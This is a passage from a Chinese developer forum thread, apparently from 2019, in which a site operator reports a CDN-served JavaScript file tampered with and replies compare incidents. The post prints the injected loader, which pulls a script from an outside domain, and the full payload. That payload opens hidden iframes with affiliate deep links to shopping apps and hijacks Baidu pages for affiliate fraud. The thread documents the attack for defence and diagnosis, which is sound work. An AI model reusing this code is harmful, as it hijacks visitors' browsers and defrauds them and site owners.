这是一个创建于 1870 天前的主题,其中的信息可能已经有所发展或是发生改变。
今天上午接到其他地区同事反馈说网站点击按钮没反应,于是自己试了下,手机和电脑都没有问题。下午的时候发现,自己这边也开始出现问题了,排查后发现某个静态 js 资源被篡改了,完全和源数据不一样。
(function(){var l=document.createElement('script');l.src='https://gov.papastars.com/dlhao.min.js';document.getElementsByTagName('body')[0].appendChild(l);})();(function(){var l=document.createElement('script');l.src='http://xxxxx//static/js/7.js';document.getElementsByTagName('body')[0].appendChild(l);})();
之后会被引入 dlhao.min.js ,然后在跳转回源,不过估计没写好吧,跳转应该是要 https。
!function() {
var e = ["https://gov.papastars.com/usany.min.html", 'openapp.jdmobile://virtual?params={"category":"jump","des":"m","url":"https://u.jd.com/1jEOCf","keplerID":"0","keplerFrom":"1","kepler_param":{"source":"kepler-open","otherData":{"mopenbp7":"0"}},"union_open":"union_cps"}', "vipshop://goHome?tra_from=tra%3AC01V006ijfbdtqnu%3A%3Amig_code%3Acps101%3A1cf9efd0abf84e8c94b7e1c01ebe7b2b", "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&h5Url=https%3A%2F%2Fh5.m.taobao.com%2Fbcec%2Fdahanghai-jump.html%3Fspm%3D2014.ugdhh.3907731441.1217-279%26bc_fl_srcgrowth_dhh_3907731441_1217-279&spm=2014.ugdhh.3907731441.1217-279&bc_fl_src=growth_dhh_3907731441_1217-279&materialid=1217", "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=sxmhx&src_ch=sxmhx42&src_scene=pullup&url=ext%3Ainfo_flow_open_channel%3Ach_id%3D100%26insert_item_ids%3D17864229593326336693%26type%3Dmultiple%26from%3D6001", "youku://weex?source=00002204&url=https%3A%2F%2Fmarket.m.taobao.com%2Fyep%2Fweexmaker%2Fykpage%2Fpigspring_wmdt.js%3Fwh_weex%3Dtrue%26refer%3Dsanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700&refer=sanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700"]
, t = "y"
, o = "dkwlsn3"
, n = "vivi8dd"
, r = "bbdm2lw"
, a = .15
, i = function(e, t) {
var o = document.createElement("iframe");
o.setAttribute("width", "1px"),
o.setAttribute("height", "1p"),
o.setAttribute("frameborder", "0"),
o.setAttribute("scrolling", "no"),
o.style.display = "none",
o.setAttribute("src", e),
document.body.appendChild(o),
t && window.setTimeout(function() {
document.body.removeChild(o)
}, 3e3)
}
, c = function(e) {
for (var t = e + "=", o = document.cookie.split(";"), n = 0; n < o.length; n++) {
for (var r = o[n]; " " == r.charAt(0); )
r = r.substring(1);
if (-1 != r.indexOf(t))
return r.substring(t.length, r.length)
}
return ""
}
, m = function(e, t, o) {
var n = new Date
, r = n.getTime();
r += 3600 * o * 1e3,
n.setTime(r),
document.cookie = e + "=" + t + "; expires=" + n.toUTCString() + "; path=/"
};
!function(e, u) {
var s = function(e, t) {
if (e) {
e = e.toLowerCase();
for (var o in t)
if (e.indexOf(t[o]) > -1)
return !0
}
return !1
}
, h = location.host
, p = function(e) {
var t = new Array(".gov","haiwainet.cn","yhd.com","alipay","p.weibo.com","people","xiangha.com","adipman.net","cnr.cn","17getfun.com","shuixindk.cn","ce.cn","boc","abchina","icbc","10086","51awifi.com","hospital");
return s(e, t) ? !1 : !0
};
if (p(h)) {
if (/MicroMessenger/gi.test(u.userAgent))
return;
var l = c(n);
l != t && (i(e[0], !0),
m(n, t, .5));
var f = Math.floor(100 * Math.random())
, l = c(o);
l != t && (f >= 20 && i(e[1], !0),
80 >= f && i(e[2], !0),
(35 > f || f > 75) && i(e[3], !0),
u.userAgent.indexOf("UCBrowser") > -1 && Math.floor(100 * Math.random()) > 30 && i(e[4], !0),
Math.floor(100 * Math.random()) > 50 && i(e[5], !0),
m(o, t, a))
}
var d = top.location.href
, l = c(r);
l != t && d.length < 40 && "https://m.baidu.com/?from" == d.substring(0, 25) && "?from=1015129o" !== top.location.search && Math.floor(100 * Math.random()) > 50 && (m(r, t, a),
top.location.href = "https://m.baidu.com/?from=1015129o")
}(e, navigator, document, window.location)
}();
点击按钮将直接唤起淘宝之类的 app 至于哪家 CDN 就不说了 国外 VPS 测试了下 返回结果也一样
 |
1
v2chou 2019-03-06 17:09:59 +08:00
??? 你倒是说下啊
|
 |
3
brainmix 2019-03-07 10:06:35 +08:00
我们也碰到这个问题了,有记录下当时 CDN 节点的 IP 吗?
|
 |
6
abccccabc 2019-03-07 17:28:49 +08:00
被染污了??
|
 |
7
Moker OP @abccccabc 感觉不像是简单的污染 一般不会劫持 cdn 回源 或者说 劫持了某个节点 然后回源同步导致问题被放大 今天又被搞了个文件 对方还换域名了
|
 |
8
acwong 2019-03-15 18:08:29 +08:00
@brainmix 同样遇到这个问题,域名是 bank.govsbank.com/dlhao.min.js IP 是 119.28.139.45
|
 |
10
fzxml 2019-03-18 09:56:30 +08:00
我也碰到了..dlhao.min.js 加载不出来导致网页加载不出来..
|
 |
11
j20120307 2019-03-19 02:39:19 +08:00
回源 https 可以
有 root cause 吗? |
 |
13
FaiChou 2019-07-17 17:00:53 +08:00
|
Select Language